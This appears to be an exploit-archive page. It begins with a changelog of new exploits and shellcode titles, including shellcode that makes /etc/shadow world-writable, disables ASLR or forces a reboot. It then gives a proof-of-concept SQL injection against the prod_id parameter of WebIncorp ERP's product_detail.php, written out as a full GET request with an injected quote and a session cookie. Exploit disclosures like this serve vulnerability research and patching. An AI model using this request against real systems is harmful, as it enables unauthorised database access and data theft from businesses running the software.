
6 changes to exploits/shellcodes Ultimate Loan Manager 2.0 - Cross-Site Scripting WebIncorp ERP - SQL injection Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode (168 bytes) Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes) Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes) Linux/x86 - Force Reboot Shellcode (51 bytes)
21 lines
No EOL
763 B
Text
21 lines
No EOL
763 B
Text
# Exploit Title: WebIncorp ERP - SQL injection
|
|
# Date: 1.8.2019.
|
|
# Exploit Author: n1x_ [MS-WEB]
|
|
# Vendor Homepage: https://www.webincorp.com/products/erp-software-qatar
|
|
# Version: Every version
|
|
# CWE : CWE-89
|
|
|
|
Vulnerable parameter: prod_id (product_detail.php)
|
|
|
|
[GET Request]
|
|
|
|
GET https://host/product_detail.php?prod_id=x' HTTP/1.1
|
|
Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8
|
|
Accept-Encoding: gzip, deflate, br
|
|
Accept-Language: en-US
|
|
Cache-Control: max-age=0
|
|
Cookie: PHPSESSID=t57dv7rdsvut33jroled9v6435
|
|
Host: host
|
|
Referer: https://host/
|
|
Upgrade-Insecure-Requests: 1
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362 |